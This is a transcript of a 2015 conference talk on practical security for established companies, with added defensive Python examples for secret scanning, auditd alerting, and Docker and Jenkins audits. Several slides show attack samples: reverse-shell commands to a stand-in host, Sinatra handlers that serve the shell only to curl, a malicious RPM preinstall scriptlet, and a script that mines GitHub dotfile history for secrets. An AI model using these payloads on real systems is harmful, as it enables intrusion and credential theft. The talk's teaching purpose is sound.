Security for non-Unicorns. SecTor 2015

Bea Hughes
October 20, 2015


Security is becoming quite the thing nowadays; everyone wants to have some. The mantra that things should be built with security in mind and can't be plastered on later is a very important one, whether you are established or you're based in Silicon Valley and about to write "the new hotness". However, what happens if your company is older than, say, 6 months? You will already have some legacy systems and code. I'll be talking about how it's possible to unearth some of the security issues you may face, how to stop them happening, what happens when you do uncover them, and coping strategies for dealing with them.

Transcript

  1. Security For Non-Unicorns [1] @benjammingh for SecTor 2015
     [1] https://www.etsy.com/listing/205741051/unicorn-dog-hat-rainbow-unicorn-dog

  2. Who's this clown? » Infrastructure security at Etsy. » Recovered operations monkey at Puppet Labs. » Own a lot of black t-shirts. » Had 1300 accounts on his high school Linux system. (: [2]
     [2] https://twitter.com/skullmandible/status/411281851131523072

  3. Setlist » Intros (you are here). » Few real world problems & applications. » Fixes, or at least coping mechanisms. » Panicked summary based on time. » Comments thinly masked as questions.
  4. Security!

  5. Unicorns?

  6. The problem: security is hard.

  7. From tiny seeds, do mighty acorns grow. » PinkiePwn's 6 tiny bugs in Chrome to full sandbox escape. » Egor Homakov's 5 small bugs in GitHub to full private access on GitHub. » XSS to remote code execution in under an hour. » Username & password from an HVAC system leads to the $160+ million Target breach.
  8. Things that are not security are hard too.

  9. Computerising is hard. No. 1 takeaway for security types is a sense of perspective. (maybe even humility! gasp)

  10. Security people aren't great secure coders. » Snort: 10 CVEs, Wireshark: 322! CVEs » Security Firm Bit9 Hacked, Used to Spread Malware » Joxean Koret on Breaking Antivirus software » Tavis from Project Zero on exploiting ESET » BEST! FireEye just running Apache/PHP as root!

  11. So who do I trust? » No one? Always a great position for security people who don't want to get paid. » Everyone? Do I have some emails with funny cats for you to click on. » Security vendors? If you have infinite money and no attackers. » Attackers!
  12. "You're already being probed for security holes, do you want to know or not?"

  13. Bug bounties 101: Have one! Bugcrowd vs. HackerOne

  14. Bug bounties 102: Prepare a lot.

  15. Bug bounties 103: The first few weeks will be hell.

  16. Bug bounties 104: Be ready with bees!
  17. Security on the inside

  18. Armadillo security architecture

  19. [image]

  20. Cloud

  21. GitHub

  22. [image]

  23. But this doesn't happen in real life, right?

  24. [image]
  25. terrible bash example (don't do this)

     # Step 1 (commented out): clone every org member's public dotfiles repo.
     # for i in $(curl --silent 'https://api.github.com/orgs/<target>/members' \
     #     | grep html_url | cut -f 4 -d '"' | cut -d / -f 4); \
     # do ( curl --silent https://api.github.com/repos/$i/dotfiles | grep -q 'Not Found' || \
     #      git clone https://github.com/$i/dotfiles.git $i ) \
     # ; done

     # Step 2: in a directory of clones, grep EVERY revision (deleted secrets
     # stay in history) for the regex given as $1, prefixing hits with the repo.
     for i in * ; do
       [ -d "$i/.git" ] || continue
       cd "$i"
       for revision in $(git rev-list --all) ; do
         unset PAGER
         export GIT_PAGER=""
         # find . -iname \*.key -or -iname \*.pem
         out="$(git grep -i -E "$1" "${revision}")"
         if [ $? -eq 0 ] ; then
           echo "${out}" | LANG="C" sed "s/^/$i: /"
         fi
       done
       cd ..
     done

  26. Go use Gitrob » http://michenriksen.com/blog/gitrob-putting-the-open-source-in-osint/ » https://github.com/michenriksen/gitrob
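Whatever drives the loop above (or Gitrob), the part that decides "is this a secret?" still needs writing. The block below is an added example for this page, not code from the talk or from Gitrob: a small Python scanner with a few fixed credential shapes plus a Shannon-entropy check for random-looking tokens, run over a constructed dotfiles-style file. The AWS key id and secret in the sample are the pair AWS publishes as documentation examples (not live credentials); the regexes and the 4.0 bits/char threshold are this example's own choices. To use it on history, feed it the content of each file at each revision (`git show <rev>:<path>` for every path in `git ls-tree -r <rev>`).

```python
"""Scan text for things that look like credentials.

Added example for this page (not the talk's or Gitrob's code). The patterns
and threshold are heuristics chosen for this example; tune them to your repos.
"""
import math
import re

# Credential shapes with a fixed format. The AWS access key id format
# (AKIA + 16 upper-case alphanumerics) is documented by AWS; the other two
# are this example's own heuristics.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key_block": re.compile(
        r"-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----"),
    "password_assignment": re.compile(
        r"(?i)\b(?:password|passwd|secret|api[_-]?key)\b\s*[=:]\s*['\"]?([^\s'\"]{6,})"),
}

# API keys and session secrets have no fixed shape, so fall back to
# "long, base64/hex-ish and high entropy".
TOKEN_RE = re.compile(r"[A-Za-z0-9+/=_\-]{20,}")
ENTROPY_THRESHOLD = 4.0  # bits per character; identifiers and prose sit nearer 3


def shannon_entropy(s):
    """Bits per character of the string's character distribution."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def find_secrets(text, path="<input>"):
    """Return a list of (path, line_no, rule, matched_text) findings, in file order."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for rule, rx in PATTERNS.items():
            for m in rx.finditer(line):
                findings.append((path, line_no, rule, m.group(0)))
        # Entropy rule: skip tokens already covered by a fixed-shape match on this line.
        already = [f[3] for f in findings if f[1] == line_no]
        for m in TOKEN_RE.finditer(line):
            tok = m.group(0)
            if any(tok in hit for hit in already):
                continue
            if shannon_entropy(tok) >= ENTROPY_THRESHOLD:
                findings.append((path, line_no, "high_entropy_token", tok))
    return findings


# Constructed sample: the kind of thing a personal dotfiles commit contains.
# The AWS values are the documented AWS example pair, not a live credential.
SAMPLE_FILE = """\
export EDITOR=vim
# aws creds
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
password = hunter2
placeholder = aaaaaaaaaaaaaaaaaaaaaaaa
-----BEGIN RSA PRIVATE KEY-----
"""

if __name__ == "__main__":
    for path, line_no, rule, hit in find_secrets(SAMPLE_FILE, "dotfiles/.bashrc"):
        print("%s:%d %s: %s" % (path, line_no, rule, hit))
```

Note what the sample shows: the secret-key line is caught only by the entropy rule (the name `aws_secret_access_key` does not contain a word-bounded `secret`), while the 24-character `aaaa...` placeholder is long enough to be a token but has zero entropy and is correctly ignored. Expect false positives on base64 blobs and hashes; the point is to triage them, not to trust the output blindly.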
  27. Auditd

  28. Auditd is the best way to get command execution logged in your infrastructure.

  29. Auditd is the worst way to get this information to a log file.

     type=SYSCALL msg=audit(123:3020171): arch=c000003e syscall=59 success=yes exit=0 items=3 ppid=9200 pid=9202 auid=0 uid=1000....
     type=EXECVE msg=audit(123:3020171): argc=3 a0="/usr/bin/perl" a1="-w" a2="/bin/sketchy.pl"
     type=CWD msg=audit(123:3020171): cwd="/home/superdave/hax"
     type=PATH msg=audit(123:3020171): item=0 name="/bin/sketchy.pl" inode=208346 dev=fe:02 mode=0100755 ouid=0 ogid=0 rdev=00:00
     type=PATH msg=audit(123:3020171): item=1 name=(null) inode=200983 dev=fe:02 mode=0100755 ouid=0 ogid=0 rdev=00:00
     type=PATH msg=audit(123:3020171): item=2 name=(null) inode=46 dev=fe:02 mode=0100755 ouid=0 ogid=0 rdev=00:00

  30. Mark Ellzey on Auditd.

  31. WHY? "Why are the logs multiline?" -- David Shing, aka "Shingy", aka "The Shing", aka "AOL's digital prophet"

  32. Multiline logs are the spawn of The Devil, Oracle's Java

  33. Coping with multiline auditd » ELK: multiline filter in Logstash. » Other: github/gdestuynder/Audisp-json » Have cash, want a decent GUI (and more): Go use Threatstack! » Write something yourself in Python & Go: I keep promising to OSS this ):

  34. Alert on sketchy things. (assumes ELK) 1. Elastalert from Yelp 2. Alert on "/bin/nc *-e /bin/sh*" 3. You will now find when someone tries to run a reverse shell! 4. Or when your ops people do fun things.
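The two slides above hide a real detection problem: the SYSCALL, EXECVE, CWD and PATH records of one execve() are separate lines, the arguments arrive as separate `a0=`, `a1=`, ... fields, and any argument containing a space is hex-encoded rather than quoted, so a pattern like `"/bin/nc *-e /bin/sh*"` applied to raw lines will miss `bash -c 'nc -e /bin/sh ...'` entirely. The block below is an added example for this page, not the speaker's unreleased tool and not ElastAlert: it re-joins records on the `msg=audit(<time>:<serial>)` key, decodes hex arguments, rebuilds a shell-quoted command line and runs a few reverse-shell rules over it. The log lines in `SAMPLE_LOG` are constructed in the style of the slide (the `uid=48` / unset `auid` event stands for a web server process, the kind of thing that fires after a `curl | bash` or a PHP bug); the rules are illustrative, not a complete set.

```python
"""Join multi-record auditd events and alert on reverse-shell-looking execve()s.

Added example for this page, not the speaker's code and not ElastAlert.
SAMPLE_LOG is constructed; RULES are illustrative.
"""
import re
import shlex
from collections import defaultdict

# One syscall produces several records (SYSCALL, EXECVE, CWD, PATH...) that
# share the msg=audit(<time>:<serial>) key; that key is how to re-join them.
RECORD_RE = re.compile(
    r"^type=(?P<type>\w+) msg=audit\((?P<ts>[\d.]+):(?P<serial>\d+)\):\s*(?P<body>.*)$")
FIELD_RE = re.compile(r'(\w+(?:\[\d+\])?)=("(?:[^"\\]|\\.)*"|\S+)')
ARG_KEY_RE = re.compile(r"^a\d+$")
HEX_RE = re.compile(r"^(?:[0-9A-Fa-f]{2})+$")

# Matched against the re-assembled, shell-quoted command line, not against
# single records, so "nc" "-e" "/bin/sh" split over three aN= fields still hits.
RULES = {
    "nc_reverse_shell": re.compile(
        r"(?:^|[\s/'\"])(?:nc|ncat|netcat)\b.*\s-e\s+/bin/(?:ba|da)?sh\b"),
    "bash_dev_tcp": re.compile(r"/dev/tcp/\d"),
    "curl_pipe_shell": re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:sudo\s+)?(?:ba)?sh\b"),
}


def parse_fields(body):
    """key=value pairs. Quoted values are literal; an unquoted aN value is hex
    (auditd hex-encodes args containing spaces, quotes or control bytes).
    Oversized args split as a2[0]=, a2[1]= are left unjoined here."""
    fields = {}
    for key, val in FIELD_RE.findall(body):
        if val.startswith('"') and val.endswith('"'):
            fields[key] = val[1:-1]
        elif ARG_KEY_RE.match(key) and HEX_RE.match(val):
            fields[key] = bytes.fromhex(val).decode("utf-8", "replace")
        else:
            fields[key] = val
    return fields


def group_events(lines):
    """{(ts, serial): {record_type: [fields, ...]}}"""
    events = defaultdict(lambda: defaultdict(list))
    for line in lines:
        m = RECORD_RE.match(line.strip())
        if m:
            events[(m["ts"], m["serial"])][m["type"]].append(parse_fields(m["body"]))
    return events


def command_line(execve):
    """argc + a0..aN back into one shell-quoted string."""
    argc = int(execve.get("argc", 0))
    return shlex.join([execve.get("a%d" % i, "") for i in range(argc)])


def alerts_for(lines):
    """One alert per (event, rule), with the context an analyst wants first."""
    alerts = []
    for (ts, serial), recs in sorted(group_events(lines).items()):
        if not recs.get("EXECVE"):
            continue
        cmd = command_line(recs["EXECVE"][0])
        sysc = recs["SYSCALL"][0] if recs.get("SYSCALL") else {}
        cwd = recs["CWD"][0].get("cwd") if recs.get("CWD") else None
        for rule, rx in RULES.items():
            if rx.search(cmd):
                alerts.append({"rule": rule, "ts": ts, "serial": serial,
                               "auid": sysc.get("auid"), "uid": sysc.get("uid"),
                               "exe": sysc.get("exe"), "cwd": cwd, "cmd": cmd})
    return alerts


# Constructed sample. Event 1 is the slide's perl run; event 2 is a web server
# (uid 48, auid unset = no login session) spawning nc; event 3 has the whole
# reverse shell hidden in one hex-encoded bash -c argument.
SAMPLE_LOG = """\
type=SYSCALL msg=audit(1445357203.101:3020171): arch=c000003e syscall=59 success=yes exit=0 items=3 ppid=9200 pid=9202 auid=1000 uid=1000 gid=1000 comm="perl" exe="/usr/bin/perl" key="exec"
type=EXECVE msg=audit(1445357203.101:3020171): argc=3 a0="/usr/bin/perl" a1="-w" a2="/bin/sketchy.pl"
type=CWD msg=audit(1445357203.101:3020171): cwd="/home/superdave/hax"
type=PATH msg=audit(1445357203.101:3020171): item=0 name="/bin/sketchy.pl" inode=208346 dev=fe:02 mode=0100755 ouid=0 ogid=0 rdev=00:00
type=SYSCALL msg=audit(1445357209.337:3020184): arch=c000003e syscall=59 success=yes exit=0 items=2 ppid=31337 pid=31338 auid=4294967295 uid=48 gid=48 comm="nc" exe="/bin/nc" key="exec"
type=EXECVE msg=audit(1445357209.337:3020184): argc=5 a0="/bin/nc" a1="-e" a2="/bin/sh" a3="root.legit.pw" a4="2222"
type=CWD msg=audit(1445357209.337:3020184): cwd="/var/www/html"
type=SYSCALL msg=audit(1445357215.500:3020190): arch=c000003e syscall=59 success=yes exit=0 items=2 ppid=9200 pid=9250 auid=1000 uid=0 gid=0 comm="bash" exe="/bin/bash" key="exec"
type=EXECVE msg=audit(1445357215.500:3020190): argc=3 a0="bash" a1="-c" a2=6E63202D65202F62696E2F73682031302E302E302E352032323232
type=CWD msg=audit(1445357215.500:3020190): cwd="/root"
"""

if __name__ == "__main__":
    for a in alerts_for(SAMPLE_LOG.splitlines()):
        print("%(rule)s serial=%(serial)s auid=%(auid)s uid=%(uid)s cwd=%(cwd)s: %(cmd)s" % a)
```

The `auid` is worth carrying into every alert: it survives `sudo` and `su`, so it tells you which human (or, when it is the unset value 4294967295, which daemon) ultimately ran the thing, which `uid=0` alone never will. In a real pipeline you would do this re-joining before the log reaches Elasticsearch (the audisp-json and Logstash multiline options on the previous slide exist for exactly this), then alert on the joined `cmd` field rather than on raw lines.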
  35. curl | bash

  36. curl legit.pw | sh

  37. "But I check them, obviously!"

  38. Sinatra example

     require 'sinatra'

     # Serve the reverse shell only to curl; anyone reading the URL in a
     # browser sees the real installer. print_install_code is the (assumed)
     # helper that returns the genuine script.
     get '/install.sh' do
       if request.env['HTTP_USER_AGENT'] =~ /curl/
         return 'nc -e /bin/sh root.legit.pw 2222 &'
       else
         return print_install_code()
       end
     end

  39. Sinatra example 2: Payback

     require 'sinatra'
     require 'set'

     seen_before = Set.new   # assumed: one entry per client IP already served

     # The first request from an IP gets the reverse shell; every later one
     # (the "let me just check what it does") gets the real installer.
     get '/install.sh' do
       ip = request.env['HTTP_CLIENT_IP']
       if seen_before.include? ip
         return print_install_code()
       else
         seen_before << ip
         return 'nc -e /bin/sh root.legit.pw 2222 &'
       end
     end

  40. [image]

  41. [image]

  42. curl | bash "But this is no worse than packages."
     foo$ sudo yum install sketchy
     foo$ sudo aptitude install sketchy

  43. curl | bash "but worse than downloading RPMs from a random site?"
     foo$ rpm --checksig sketchy.1.33-7.rpm
     foo$ dpkg-sig --verify sketchy.1.33-7.deb

  44. curl | bash
     root# rpm -qp --scripts sketchy-1.33-7.rpm
     preinstall scriptlet (using /bin/sh):
     bash -c 'while : ; \
       do \
         nc -e /bin/sh root.legit.pw 2222 ;\
       done'

  45. Verifiable. This doesn't exist:
     foo$ curl legit.pw/sketch.sh | sudo sh --gpg-verify
     No one has ever done this:
     foo$ curl legit.pw/sketch.sh | gpg --decrypt | sudo sh
     # (gpg --verify writes nothing to stdout; --decrypt checks the signature on a signed file and emits its contents)
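The two Sinatra handlers above, and the "what would checking actually look like" question, as an added example for this page (not the speaker's code): the same server-side tricks rebuilt in Python on a loopback HTTP server, a client-side check that fetches the URL as curl and as a browser and compares the bytes, and the boring alternative of comparing the bytes you are about to run against a digest obtained some other way. The hostname `root.legit.pw`, the payload and the installer text are constructed; the only real behaviour is HTTP.

```python
"""curl | bash: server-side tricks and what a client can do about them.

Added example for this page, not the speaker's code. Payload, installer text
and hostnames are constructed.
"""
import hashlib
import http.server
import threading
import urllib.request

REAL_INSTALLER = b"#!/bin/sh\necho 'installing sketchy 1.33-7'\n"
PAYLOAD = b"nc -e /bin/sh root.legit.pw 2222 &\n"


def by_user_agent(user_agent):
    """Slide 38: curl gets the shell, browsers get the real thing."""
    return PAYLOAD if "curl" in user_agent else REAL_INSTALLER


def by_first_visit(client_ip, seen_ips):
    """Slide 39: the first request from an IP gets the shell, all later
    ones (the 'I'll just look at it') get the real thing. Mutates seen_ips."""
    if client_ip in seen_ips:
        return REAL_INSTALLER
    seen_ips.add(client_ip)
    return PAYLOAD


class SniffingHandler(http.server.BaseHTTPRequestHandler):
    """Loopback stand-in for the malicious server (user-agent variant)."""

    def do_GET(self):
        body = by_user_agent(self.headers.get("User-Agent", ""))
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # keep the demo quiet


def serve_in_background():
    srv = http.server.HTTPServer(("127.0.0.1", 0), SniffingHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d/install.sh" % srv.server_address[1]


def fetch(url, user_agent):
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req, timeout=5) as resp:
        return resp.read()


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def same_for_everyone(url):
    """Client-side check: fetch as curl and as a browser. Different bytes
    mean the server chooses content per client. Returns (same, curl_body, browser_body)."""
    as_curl = fetch(url, "curl/7.45.0")
    as_browser = fetch(url, "Mozilla/5.0 (X11; Linux x86_64; rv:41.0) Gecko/20100101 Firefox/41.0")
    return sha256_hex(as_curl) == sha256_hex(as_browser), as_curl, as_browser


def safe_to_run(script_bytes, pinned_sha256):
    """The boring answer: keep the exact bytes you will execute, compare them
    with a digest you got out of band (release notes, a signed tag), then run."""
    return sha256_hex(script_bytes) == pinned_sha256


if __name__ == "__main__":
    srv, url = serve_in_background()
    same, as_curl, as_browser = same_for_everyone(url)
    print("identical for curl and browser:", same)
    print("curl got:     ", as_curl.decode().strip())
    print("browser got:  ", as_browser.decode().strip())
    srv.shutdown()
```

Two caveats the code makes visible. The two-fetch comparison only catches the user-agent variant; the first-visit variant hands the payload to whichever client arrives first and looks clean to everyone after, so comparing fetches proves nothing about the bytes your shell already consumed. And in any `... | gpg ... | sudo sh` pipeline `sh` starts executing what it has read before the verifier in front of it has finished, so verification has to complete on a saved file before anything is executed, which is what `safe_to_run` assumes.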
  46. curl | bash "But I trust HTTPS" » HTTPS certs cost ~$6. » If I can't make $6 by owning a system, I should probably stop being an attacker. » @letsencrypt will soon make this free.

  47. curl | bash: curl -k

  48. curl --yolo | sudo sh --yolo

  49. curl | bash: What to do?

  50. A LIVE DEMO, madness.

  51. Lightweight containers!

  52. chroot(8)

  53. FreeBSD Jails

  54. Solaris Zones

  55. AIX WPAR

  56. [image]

  57. Is Docker secure?

  58. ">30% of Images in Docker Hub Contain High Priority Security Vulns" - Jayanth Gummaraju, Tarun Desikan and Yoshio Turner from BanyanOps

  59. >30% of MSDN CDs contain high priority security vulns

  60. [image]

  61. As secure as Vagrant?

  62. But is Docker itself secure? » Don't run things as root. » No really, stop running things as root. » Did I mention not running things as root. » It is also not 1999. (Docker 1.8 addresses some of this, with its changes to who it runs as)

  63. Securify the Docker. » Don't use --privileged. » Use --cap-drop all and --cap-add <thing> to get the minimum capabilities. » Use Docker Notary » Use grsecurity (just do that anyway, if you can.) » Use SELinux... I may as well ask for a pony here.
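The two Docker slides above are a checklist, and checklists are easiest to keep honest when a script reads them off the running system. The block below is an added example for this page, not Docker tooling: it takes the `Config` and `HostConfig` parts of a `docker inspect <container>` document and reports the things the slides warn about (root user, `--privileged`, capabilities not dropped to a minimum, host namespaces, the Docker socket mounted inside). Both sample configurations are constructed to mimic inspect output for a sloppy and a hardened `docker run`; the list of capabilities treated as dangerous and the `no-new-privileges` check are this example's own policy choices.

```python
"""Audit a container's config against the slides: not root, not --privileged,
capabilities dropped to a minimum, no host namespaces or docker.sock.

Added example for this page, not Docker's own tooling. Input is the
Config/HostConfig subset of `docker inspect` output; samples are constructed.
"""

# Capabilities that make a breakout or lateral move much easier; this set is
# this example's policy, not an official list.
DANGEROUS_CAPS = {"ALL", "SYS_ADMIN", "SYS_PTRACE", "SYS_MODULE", "NET_ADMIN",
                  "DAC_READ_SEARCH", "SYS_RAWIO"}


def _security_opts(host):
    """Normalise SecurityOpt entries like 'no-new-privileges:true' to their name."""
    return {o.split(":")[0].split("=")[0] for o in (host.get("SecurityOpt") or [])}


def audit_container(inspect):
    """Return a list of human-readable findings; an empty list means it passed."""
    host = inspect.get("HostConfig", {})
    conf = inspect.get("Config", {})
    findings = []

    user = (conf.get("User") or "").split(":")[0]
    if user in ("", "0", "root"):
        findings.append("runs as root: set USER in the image or pass --user uid:gid")

    if host.get("Privileged"):
        findings.append("--privileged: every capability, every host device, no seccomp")

    cap_drop = {c.upper() for c in (host.get("CapDrop") or [])}
    cap_add = {c.upper() for c in (host.get("CapAdd") or [])}
    if "ALL" not in cap_drop:
        findings.append("capabilities not dropped: use --cap-drop all, then --cap-add only what is needed")
    bad_adds = sorted(cap_add & DANGEROUS_CAPS)
    if bad_adds:
        findings.append("dangerous capabilities added: " + ", ".join(bad_adds))

    for mode, flag in (("NetworkMode", "--net=host"), ("PidMode", "--pid=host")):
        if host.get(mode) == "host":
            findings.append("%s: container shares the host namespace" % flag)

    for bind in host.get("Binds") or []:
        if bind.split(":")[0] == "/var/run/docker.sock":
            findings.append("docker socket mounted: root on the host for anyone inside the container")

    if "no-new-privileges" not in _security_opts(host):
        findings.append("no-new-privileges not set: setuid binaries inside can still escalate")
    return findings


# Constructed: roughly what inspect shows after
#   docker run --privileged --net=host --cap-add SYS_ADMIN \
#       -v /var/run/docker.sock:/var/run/docker.sock sketchy
SKETCHY = {
    "Config": {"User": ""},
    "HostConfig": {"Privileged": True, "CapAdd": ["SYS_ADMIN"], "CapDrop": None,
                   "NetworkMode": "host", "PidMode": "",
                   "Binds": ["/var/run/docker.sock:/var/run/docker.sock"],
                   "SecurityOpt": None},
}

# Constructed: roughly what inspect shows after
#   docker run --user 1000:1000 --cap-drop all --cap-add NET_BIND_SERVICE \
#       --security-opt no-new-privileges sketchy
HARDENED = {
    "Config": {"User": "1000:1000"},
    "HostConfig": {"Privileged": False, "CapAdd": ["NET_BIND_SERVICE"], "CapDrop": ["ALL"],
                   "NetworkMode": "default", "PidMode": "", "Binds": None,
                   "SecurityOpt": ["no-new-privileges"]},
}

if __name__ == "__main__":
    for name, cfg in (("sketchy", SKETCHY), ("hardened", HARDENED)):
        print(name + ":")
        for f in audit_container(cfg) or ["ok"]:
            print("  - " + f)
```

Running it against real hosts is `docker inspect $(docker ps -q)` piped through `json.load`; the interesting part is usually not the findings themselves but who gets paged when a team's "temporary" `--privileged` shows up in production.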
  64. But is Docker secure? More secure than what?

  65. More secure than what? From whom?

  66. [image]

  67. Threat modelling for beginners 1. What are you actually defending against? 2. From whom? 3. For how much?

  68. Lateral movement > uid=0

  69. <pinch of salt goes here> » I am not saying Docker is ZOMG unhackable. » It's just cgroups and namespacing. (just) » Escapes will happen. » They have a rad security team (Hi @diogomonica and @nathanmccauley)

  70. unpinchofsaltd » You can use it in a way that is secure, enough. » Network separation & segregation still works. » Secrets/credentials still a bigger problem. » PLEASE don't just adopt it because it's new & shiny. » unikernels ✨

  71. Jenkins!

  72. Its entire job is to take arbitrary code and run it, with access to some secret/credential.

  73. It's literally remote code execution as a service.

  74. old crufty configs + all your code & secrets

  75. [image]

  76. RCE as a service [6] Hacking Jenkins Servers With No Password

  77. Make Jenkins suck fewer * Disable execution on the master Jenkins host. * Disable anonymous access. * (Use Travis, if you can)
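The three fixes on the slide are all settings in `$JENKINS_HOME/config.xml`, so they can be checked without clicking through the UI. The block below is an added example for this page, not a Jenkins feature: it parses that file and reports executors on the master, security switched off, and authorization strategies that let anonymous users in. The element and class names (`numExecutors`, `useSecurity`, `authorizationStrategy`, `denyAnonymousReadAccess`, `hudson.security.AuthorizationStrategy$Unsecured`) are those of a Jenkins 1.6/2.x config.xml as the writer of this example knows them; both sample documents are constructed, so confirm the names against your own file before trusting a clean result.

```python
"""Check a Jenkins config.xml for the slide's three asks: no executors on the
master, security on, no anonymous access.

Added example for this page, not a Jenkins feature. Element names are those
of a Jenkins 1.6/2.x config.xml as this example's author knows them; the
two sample documents are constructed.
"""
import xml.etree.ElementTree as ET

FULL_CONTROL = "hudson.security.FullControlOnceLoggedInAuthorizationStrategy"

# Strategies that hand anonymous users more than they should have.
OPEN_STRATEGIES = {
    "hudson.security.AuthorizationStrategy$Unsecured": "anyone can do anything, no login needed",
}


def audit_jenkins_config(xml_text):
    """Return a list of findings for one config.xml; empty means it passed."""
    root = ET.fromstring(xml_text)
    findings = []

    executors = root.findtext("numExecutors")
    if executors is None or int(executors) > 0:
        findings.append(
            "master has %s executor(s): set numExecutors to 0 so jobs, and the code "
            "they pull in, only run on agents" % (executors if executors is not None else "the default"))

    if (root.findtext("useSecurity") or "false").strip().lower() != "true":
        findings.append("useSecurity is off: every visitor is an administrator")

    strategy = root.find("authorizationStrategy")
    cls = strategy.get("class") if strategy is not None else None
    if cls is None:
        findings.append("no authorizationStrategy configured")
    elif cls in OPEN_STRATEGIES:
        findings.append("authorization strategy %s: %s" % (cls, OPEN_STRATEGIES[cls]))
    elif cls == FULL_CONTROL:
        deny = (strategy.findtext("denyAnonymousReadAccess") or "false").strip().lower()
        if deny != "true":
            findings.append("anonymous read allowed: job configs, console output and "
                            "artifacts (and whatever secrets leaked into them) are public")
    return findings


# Constructed: the "old crufty config" case.
CRUFTY = """\
<hudson>
  <version>1.609.1</version>
  <numExecutors>2</numExecutors>
  <mode>NORMAL</mode>
  <useSecurity>false</useSecurity>
  <authorizationStrategy class="hudson.security.AuthorizationStrategy$Unsecured"/>
  <securityRealm class="hudson.security.SecurityRealm$None"/>
</hudson>
"""

# Constructed: after applying the slide's three fixes.
TIDIED = """\
<hudson>
  <version>1.609.1</version>
  <numExecutors>0</numExecutors>
  <mode>EXCLUSIVE</mode>
  <useSecurity>true</useSecurity>
  <authorizationStrategy class="hudson.security.FullControlOnceLoggedInAuthorizationStrategy">
    <denyAnonymousReadAccess>true</denyAnonymousReadAccess>
  </authorizationStrategy>
  <securityRealm class="hudson.security.HudsonPrivateSecurityRealm">
    <disableSignup>true</disableSignup>
  </securityRealm>
</hudson>
"""

if __name__ == "__main__":
    for name, doc in (("crufty", CRUFTY), ("tidied", TIDIED)):
        print(name + ":")
        for f in audit_jenkins_config(doc) or ["ok"]:
            print("  - " + f)
```

Executors on the master are the one people forget: with `numExecutors` above zero any job, and therefore anyone who can edit a job or push to a branch it builds, runs code as the Jenkins user on the host that holds every credential in the instance.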
  78. But what if Jenkins could be harnessed for good?

  79. NOT STOLEN FROM NickG's old 2012 deck. [7] Thanks Nick. nickgsuperstar/devopssec-apply-devops-principles-to-security

  80. Jenkins as a force for [security] good » Gauntlt "be mean to your code" » https://github.com/secure-pipeline » Even Adobe blog on secure software, zomg!

  81. [image]

  82. [image]

  83. Summary » Computers are apparently hard. » Security is clearly harder still, obv. » Actually trust and humans is hard. » The typing is the easy bit. (ish)

  84. More Summary » Complex systems lead to much more complex security problems. (see OAuth) » Annual pen-tests don't scale, bug bounties can help. » Attackers are mining any public info you have (GitHub, S3, pastebin?) » No really, go check all your S3 buckets...

  85. Will there be a summary of summaries? » I beg you to stop trusting curl. » Auditd is awful, but it can be fewer awful. » Jenkins, you probably have to have one. » But that can be okay, nay, even useful for security.

  86. A summary appeared, what happened next will shock you » Docker and security can be used in the same sentence. » Understand your threat model (Apple's guide) » Don't be a FireEye, stop running things as root.

  87. Thank you » Twidder: @benjammingh » LinkedIn: lnkdin.me/p/benyeah » FidoNet: 2:254/524.13 » JitHub: github.com/barn » SpeakerDeck: speakerdeck.com/barnbarn » Etsy: Careers <--- CodeAsCraft <--- our blog